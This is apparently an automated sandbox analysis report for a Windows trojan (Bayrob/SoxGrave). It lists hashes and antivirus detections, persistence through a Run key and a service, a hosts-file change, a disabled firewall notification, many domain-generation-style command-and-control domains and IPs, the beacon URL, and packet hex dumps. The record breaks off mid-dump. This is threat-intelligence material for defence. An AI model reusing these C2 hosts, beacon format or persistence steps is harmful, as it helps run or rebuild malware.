Analysis | #totalhash

Analysis Date	2015-09-15 15:36:32
MD5	a67297798c188b224d858f38ce2f381b
SHA1	ffd4a50c0721b4908cc9cac48810fb468d2c1adf

Static Details:

File type	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section	.text md5: ffd85d76763a3346c12b6b0757150478 sha1: a84e6db75d2f7f18dcf020cf091f3badae918ca2 size: 1223168
Section	.rdata md5: 0a1e95db6195eaa75d59577835a9fe55 sha1: 1be1bf7ceeb37dadcc74d7e939b149131e635cdb size: 321536
Section	.data md5: 3099300fca511d47e26944db2d46b29b sha1: a2647d4cbf52fe6dc3b5546b9ceee81c1815b9ef size: 8192
Section	.reloc md5: a3953f2a61838eaa65c4a932d168f7fd sha1: 2737fd215a0b7697c26aac9bda13bb94b161291b size: 160256
Timestamp	2015-05-11 04:37:16
Packer	VC8 -> Microsoft Corporation
PEhash	f6126c46fd877d44a4e4fb571cdd1ef5cf23b990
IMPhash	985e81f3267377bd9755c939bc62c7bd
AV	Rising	0x59002d5f
AV	CA (E-Trust Ino)	no_virus
AV	F-Secure	Gen:Variant.Diley.1
AV	Dr. Web	Trojan.Bayrob.5
AV	ClamAV	no_virus
AV	Arcabit (arcavir)	Gen:Variant.Diley.1
AV	BullGuard	Gen:Variant.Diley.1
AV	Padvish	no_virus
AV	VirusBlokAda (vba32)	no_virus
AV	CAT (quickheal)	no_virus
AV	Trend Micro	no_virus
AV	Kaspersky	Backdoor.Win32.SoxGrave.bxy
AV	Zillya!	no_virus
AV	Emsisoft	Gen:Variant.Diley.1
AV	Ikarus	Trojan.Win32.Bayrob
AV	Frisk (f-prot)	no_virus
AV	Authentium	W32/SoxGrave.A.gen!Eldorado
AV	MalwareBytes	no_virus
AV	MicroWorld (escan)	Gen:Variant.Diley.1
AV	Microsoft Security Essentials	Trojan:Win32/Dynamer!ac
AV	K7	Trojan ( 004c77f41 )
AV	BitDefender	Gen:Variant.Diley.1
AV	Fortinet	W32/Bayrob.X!tr
AV	Symantec	Downloader.Upatre!g15
AV	Grisoft (avg)	Win32/Cryptor
AV	Eset (nod32)	Win32/Bayrob.Z
AV	Alwil (avast)	Dropper-OJQ [Drp]
AV	Ad-Aware	Gen:Variant.Diley.1
AV	Twister	no_virus
AV	Avira (antivir)	TR/Crypt.Xpack.277318
AV	Mcafee	Trojan-FGIJ!A67297798C18

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates File	C:\WINDOWS\system32\mkueqvu\tst
Creates File	C:\Documents and Settings\Administrator\Local Settings\Temp\lw8kyfn1mltgrzbzlpadcg.exe
Creates Process	C:\Documents and Settings\Administrator\Local Settings\Temp\lw8kyfn1mltgrzbzlpadcg.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\lw8kyfn1mltgrzbzlpadcg.exe

Registry	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\SPP Bus Control Engine Alerts Fax Gateway List ➝ C:\WINDOWS\system32\wonfykgn.exe
Creates File	C:\WINDOWS\system32\mkueqvu\etc
Creates File	C:\WINDOWS\system32\drivers\etc\hosts
Creates File	C:\WINDOWS\system32\mkueqvu\lck
Creates File	C:\WINDOWS\system32\mkueqvu\tst
Creates File	C:\WINDOWS\system32\wonfykgn.exe
Deletes File	C:\WINDOWS\system32\\drivers\etc\hosts
Creates Process	C:\WINDOWS\system32\wonfykgn.exe
Creates Service	Thread Reporting Fax Provider Policy IP - C:\WINDOWS\system32\wonfykgn.exe

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ Pid 808

Process
↳ Pid 856

Process
↳ C:\WINDOWS\System32\svchost.exe

Registry	HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝ NULL
Creates File	PIPE\lsarpc
Creates File	C:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates File	C:\WINDOWS\system32\WBEM\Logs\wbemess.log

Process
↳ Pid 1212

Process
↳ Pid 1324

Process
↳ Pid 1868

Process
↳ Pid 1172

Process
↳ C:\WINDOWS\system32\wonfykgn.exe

Registry	HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center\FirewallDisableNotify ➝ 1
Creates File	C:\WINDOWS\system32\mkueqvu\tst
Creates File	C:\WINDOWS\TEMP\lw8kyfn1u8zgrzb.exe
Creates File	C:\WINDOWS\system32\mkueqvu\rng
Creates File	pipe\net\NtControlPipe10
Creates File	C:\WINDOWS\system32\mkueqvu\lck
Creates File	C:\WINDOWS\system32\nxwlyxgfyhtu.exe
Creates File	C:\WINDOWS\system32\mkueqvu\cfg
Creates File	\Device\Afd\Endpoint
Creates File	C:\WINDOWS\system32\mkueqvu\run
Deletes File	C:\WINDOWS\TEMP\lw8kyfn1u8zgrzb.exe
Creates Process	C:\WINDOWS\TEMP\lw8kyfn1u8zgrzb.exe -r 52144 tcp
Creates Process	WATCHDOGPROC "c:\windows\system32\wonfykgn.exe"

Process
↳ C:\WINDOWS\system32\wonfykgn.exe

Creates File	C:\WINDOWS\system32\mkueqvu\tst

Process
↳ WATCHDOGPROC "c:\windows\system32\wonfykgn.exe"

Creates File	C:\WINDOWS\system32\mkueqvu\tst

Process
↳ C:\WINDOWS\TEMP\lw8kyfn1u8zgrzb.exe -r 52144 tcp

Network Details:

DNS	recordsoldier.net Type: A 208.91.197.241
DNS	fliersurprise.net Type: A 208.91.197.241
DNS	historybright.net Type: A 208.91.197.241
DNS	chiefsoldier.net Type: A 208.91.197.241
DNS	classsurprise.net Type: A 208.91.197.241
DNS	thosecontinue.net Type: A 208.91.197.241
DNS	throughcontain.net Type: A 208.91.197.241
DNS	belongguard.net Type: A 208.91.197.241
DNS	maybellinethaddeus.net Type: A 208.91.197.241
DNS	kimberleyshavonne.net Type: A 208.91.197.241
DNS	naildeep.com Type: A 74.220.215.218
DNS	riddenstorm.net Type: A 66.147.240.171
DNS	destroystorm.net Type: A 216.239.138.86
DNS	wheelagree.net Type: A 95.211.230.75
DNS	sticktouch.net Type: A 217.160.26.221
DNS	lifeform.net Type: A 66.147.240.162
DNS	enemyagree.net Type: A 195.22.26.253
DNS	enemyagree.net Type: A 195.22.26.254
DNS	enemyagree.net Type: A 195.22.26.231
DNS	enemyagree.net Type: A 195.22.26.252
DNS	lifetouch.net Type: A 216.245.135.10
DNS	lifeword.net Type: A 61.100.9.214
DNS	mouthword.net Type: A 66.96.163.129
DNS	lifeclock.net Type: A 162.212.2.137
DNS	lifeclock.net Type: A 198.46.51.193
DNS	husbandfound.net Type: A
DNS	leadershort.net Type: A
DNS	eggbraker.com Type: A
DNS	ithouneed.com Type: A
DNS	soilword.net Type: A
DNS	wheelform.net Type: A
DNS	saidform.net Type: A
DNS	saidagree.net Type: A
DNS	wheeltouch.net Type: A
DNS	saidtouch.net Type: A
DNS	wheelword.net Type: A
DNS	saidword.net Type: A
DNS	stickform.net Type: A
DNS	ballform.net Type: A
DNS	stickagree.net Type: A
DNS	ballagree.net Type: A
DNS	balltouch.net Type: A
DNS	stickword.net Type: A
DNS	ballword.net Type: A
DNS	enemyform.net Type: A
DNS	lifeagree.net Type: A
DNS	enemytouch.net Type: A
DNS	enemyword.net Type: A
DNS	mouthform.net Type: A
DNS	tillform.net Type: A
DNS	mouthagree.net Type: A
DNS	tillagree.net Type: A
DNS	mouthtouch.net Type: A
DNS	tilltouch.net Type: A
DNS	tillword.net Type: A
DNS	shallform.net Type: A
DNS	deepform.net Type: A
DNS	shallagree.net Type: A
DNS	deepagree.net Type: A
DNS	shalltouch.net Type: A
DNS	deeptouch.net Type: A
DNS	shallword.net Type: A
DNS	deepword.net Type: A
DNS	pushform.net Type: A
DNS	fridayform.net Type: A
DNS	pushagree.net Type: A
DNS	fridayagree.net Type: A
DNS	pushtouch.net Type: A
DNS	fridaytouch.net Type: A
DNS	pushword.net Type: A
DNS	fridayword.net Type: A
DNS	alongform.net Type: A
DNS	decemberform.net Type: A
DNS	alongagree.net Type: A
DNS	decemberagree.net Type: A
DNS	alongtouch.net Type: A
DNS	decembertouch.net Type: A
DNS	alongword.net Type: A
DNS	decemberword.net Type: A
DNS	longhard.net Type: A
DNS	soilhard.net Type: A
DNS	longclock.net Type: A
DNS	soilclock.net Type: A
DNS	longmake.net Type: A
DNS	soilmake.net Type: A
DNS	longrush.net Type: A
DNS	soilrush.net Type: A
DNS	wheelhard.net Type: A
DNS	saidhard.net Type: A
DNS	wheelclock.net Type: A
DNS	saidclock.net Type: A
DNS	wheelmake.net Type: A
DNS	saidmake.net Type: A
DNS	wheelrush.net Type: A
DNS	saidrush.net Type: A
DNS	stickhard.net Type: A
DNS	ballhard.net Type: A
DNS	stickclock.net Type: A
DNS	ballclock.net Type: A
DNS	stickmake.net Type: A
DNS	ballmake.net Type: A
DNS	stickrush.net Type: A
DNS	ballrush.net Type: A
DNS	enemyhard.net Type: A
DNS	lifehard.net Type: A
DNS	enemyclock.net Type: A
HTTP GET	http://recordsoldier.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent:
HTTP GET	http://fliersurprise.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent:
HTTP GET	http://historybright.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent:
HTTP GET	http://chiefsoldier.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent:
HTTP GET	http://classsurprise.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent:
HTTP GET	http://thosecontinue.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent:
HTTP GET	http://throughcontain.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent:
HTTP GET	http://belongguard.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent:
HTTP GET	http://maybellinethaddeus.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent:
HTTP GET	http://kimberleyshavonne.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent:
HTTP GET	http://naildeep.com/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent:
HTTP GET	http://riddenstorm.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent:
HTTP GET	http://destroystorm.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent:
HTTP GET	http://wheelagree.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent:
HTTP GET	http://sticktouch.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent:
HTTP GET	http://lifeform.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent:
HTTP GET	http://enemyagree.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent:
HTTP GET	http://lifetouch.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent:
HTTP GET	http://lifeword.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent:
HTTP GET	http://mouthword.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent:
HTTP GET	http://lifeclock.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent:
HTTP GET	http://recordsoldier.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent:
HTTP GET	http://fliersurprise.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent:
HTTP GET	http://historybright.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent:
HTTP GET	http://chiefsoldier.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent:
HTTP GET	http://classsurprise.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent:
HTTP GET	http://thosecontinue.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent:
HTTP GET	http://throughcontain.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent:
HTTP GET	http://belongguard.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent:
HTTP GET	http://maybellinethaddeus.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent:
Flows TCP	192.168.1.1:1036 ➝ 208.91.197.241:80
Flows TCP	192.168.1.1:1037 ➝ 208.91.197.241:80
Flows TCP	192.168.1.1:1038 ➝ 208.91.197.241:80
Flows TCP	192.168.1.1:1039 ➝ 208.91.197.241:80
Flows TCP	192.168.1.1:1040 ➝ 208.91.197.241:80
Flows TCP	192.168.1.1:1041 ➝ 208.91.197.241:80
Flows TCP	192.168.1.1:1042 ➝ 208.91.197.241:80
Flows TCP	192.168.1.1:1044 ➝ 208.91.197.241:80
Flows TCP	192.168.1.1:1045 ➝ 208.91.197.241:80
Flows TCP	192.168.1.1:1046 ➝ 208.91.197.241:80
Flows TCP	192.168.1.1:1047 ➝ 74.220.215.218:80
Flows TCP	192.168.1.1:1048 ➝ 66.147.240.171:80
Flows TCP	192.168.1.1:1049 ➝ 216.239.138.86:80
Flows TCP	192.168.1.1:1050 ➝ 95.211.230.75:80
Flows TCP	192.168.1.1:1051 ➝ 217.160.26.221:80
Flows TCP	192.168.1.1:1052 ➝ 66.147.240.162:80
Flows TCP	192.168.1.1:1053 ➝ 195.22.26.253:80
Flows TCP	192.168.1.1:1054 ➝ 216.245.135.10:80
Flows TCP	192.168.1.1:1055 ➝ 61.100.9.214:80
Flows TCP	192.168.1.1:1056 ➝ 66.96.163.129:80
Flows TCP	192.168.1.1:1057 ➝ 162.212.2.137:80
Flows TCP	192.168.1.1:1058 ➝ 208.91.197.241:80
Flows TCP	192.168.1.1:1059 ➝ 208.91.197.241:80
Flows TCP	192.168.1.1:1060 ➝ 208.91.197.241:80
Flows TCP	192.168.1.1:1061 ➝ 208.91.197.241:80
Flows TCP	192.168.1.1:1062 ➝ 208.91.197.241:80
Flows TCP	192.168.1.1:1063 ➝ 208.91.197.241:80
Flows TCP	192.168.1.1:1064 ➝ 208.91.197.241:80
Flows TCP	192.168.1.1:1065 ➝ 208.91.197.241:80
Flows TCP	192.168.1.1:1066 ➝ 208.91.197.241:80

Raw Pcap

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3035 3026736f   ode=sox&v=050&so
0x00000030 (00048)   783d3466 61653061 3030266c 656e6864   x=4fae0a00&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207265 636f7264 736f6c64 6965722e   : recordsoldier.
0x00000080 (00128)   6e65740d 0a0d0a                       net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3035 3026736f   ode=sox&v=050&so
0x00000030 (00048)   783d3466 61653061 3030266c 656e6864   x=4fae0a00&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a20666c 69657273 75727072 6973652e   : fliersurprise.
0x00000080 (00128)   6e65740d 0a0d0a                       net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3035 3026736f   ode=sox&v=050&so
0x00000030 (00048)   783d3466 61653061 3030266c 656e6864   x=4fae0a00&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a206869 73746f72 79627269 6768742e   : historybright.
0x00000080 (00128)   6e65740d 0a0d0a                       net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3035 3026736f   ode=sox&v=050&so
0x00000030 (00048)   783d3466 61653061 3030266c 656e6864   x=4fae0a00&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a206368 69656673 6f6c6469 65722e6e   : chiefsoldier.n
0x00000080 (00128)   65740d0a 0d0a0a                       et.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3035 3026736f   ode=sox&v=050&so
0x00000030 (00048)   783d3466 61653061 3030266c 656e6864   x=4fae0a00&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a20636c 61737373 75727072 6973652e   : classsurprise.
0x00000080 (00128)   6e65740d 0a0d0a                       net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3035 3026736f   ode=sox&v=050&so
0x00000030 (00048)   783d3466 61653061 3030266c 656e6864   x=4fae0a00&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207468 6f736563 6f6e7469 6e75652e   : thosecontinue.
0x00000080 (00128)   6e65740d 0a0d0a                       net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3035 3026736f   ode=sox&v=050&so
0x00000030 (00048)   783d3466 61653061 3030266c 656e6864   x=4fae0a00&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207468 726f7567 68636f6e 7461696e   : throughcontain
0x00000080 (00128)   2e6e6574 0d0a0d0a                     .net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3035 3026736f   ode=sox&v=050&so
0x00000030 (00048)   783d3466 61653061 3030266c 656e6864   x=4fae0a00&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a206265 6c6f6e67 67756172 642e6e65   : belongguard.ne
0x00000080 (00128)   740d0a0d 0a0a0d0a                     t.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3035 3026736f   ode=sox&v=050&so
0x00000030 (00048)   783d3466 61653061 3030266c 656e6864   x=4fae0a00&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a206d61 7962656c 6c696e65 74686164   : maybellinethad
0x00000080 (00128)   64657573 2e6e6574 0d0a0d0a            deus.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3035 3026736f   ode=sox&v=050&so
0x00000030 (00048)   783d3466 61653061 3030266c 656e6864   x=4fae0a00&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a206b69 6d626572 6c657973 6861766f   : kimberleyshavo
0x00000080 (00128)   6e6e652e 6e65740d 0a0d0a0a            nne.net.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3035 3026736f   ode=sox&v=050&so
0x00000030 (00048)   783d3466 61653061 3030266c 656e6864   x=4fae0a00&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a206e61 696c6465 65702e63 6f6d0d0a   : naildeep.com..
0x00000080 (00128)   0d0a652e 6e65740d 0a0d0a0a            ..e.net.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3035 3026736f   ode=sox&v=050&so
0x00000030 (00048)   783d3466 61653061 3030266c 656e6864   x=4fae0a00&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207269 6464656e 73746f72 6d2e6e65   : riddenstorm.ne
0x00000080 (00128)   740d0a0d 0a65740d 0a0d0a0a            t....et.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3035 3026736f   ode=sox&v=050&so
0x00000030 (00048)   783d3466 61653061 3030266c 656e6864   x=4fae0a00&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a206465 7374726f 7973746f 726d2e6e   : destroystorm.n
0x00000080 (00128)   65740d0a 0d0a740d 0a0d0a0a            et....t.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3035 3026736f   ode=sox&v=050&so
0x00000030 (00048)   783d3466 61653061 3030266c 656e6864   x=4fae0a00&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207768 65656c61 67726565 2e6e6574   : wheelagree.net
0x00000080 (00128)   0d0a0d0a 0d0a740d 0a0d0a0a            ......t.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3035 3026736f   ode=sox&v=050&so
0x00000030 (00048)   783d3466 61653061 3030266c 656e6864   x=4fae0a00&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207374 69636b74 6f756368 2e6e6574   : sticktouch.net
0x00000080 (00128)   0d0a0d0a 0d0a740d 0a0d0a0a            ......t.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3035 3026736f   ode=sox&v=050&so
0x00000030 (00048)   783d3466 61653061 3030266c 656e6864   x=4fae0a00&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a206c69 6665666f 726d2e6e 65740d0a   : lifeform.net..
0x00000080 (00128)   0d0a0d0a 0d0a740d 0a0d0a0a            ......t.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3035 3026736f   ode=sox&v=050&so
0x00000030 (00048)   783d3466 61653061 3030266c 656e6864   x=4fae0a00&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a20656e 656d7961 67726565 2e6e6574   : enemyagree.net
0x00000080 (00128)   0d0a0d0a 0d0a740d 0a0d0a0a            ......t.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3035 3026736f   ode=sox&v=050&so
0x00000030 (00048)   783d3466 61653061 3030266c 656e6864   x=4fae0a00&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a206c69 6665746f 7563682e 6e65740d   : lifetouch.net.
0x00000080 (00128)   0a0d0a0a 0d0a740d 0a0d0a0a            ......t.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3035 3026736f   ode=sox&v=050&so
0x00000030 (00048)   783d3466 61653061 3030266c 656e6864   x=4fae0a00&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a206c69 6665776f 72642e6e 65740d0a   : lifeword.net..
0x00000080 (00128)   0d0a0a0a 0d0a740d 0a0d0a0a            ......t.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3035 3026736f   ode=sox&v=050&so
0x00000030 (00048)   783d3466 61653061 3030266c 656e6864   x=4fae0a00&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a206d6f 75746877 6f72642e 6e65740d   : mouthword.net.
0x00000080 (00128)   0a0d0a0a 0d0a740d 20d59b01            ......t. ...

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
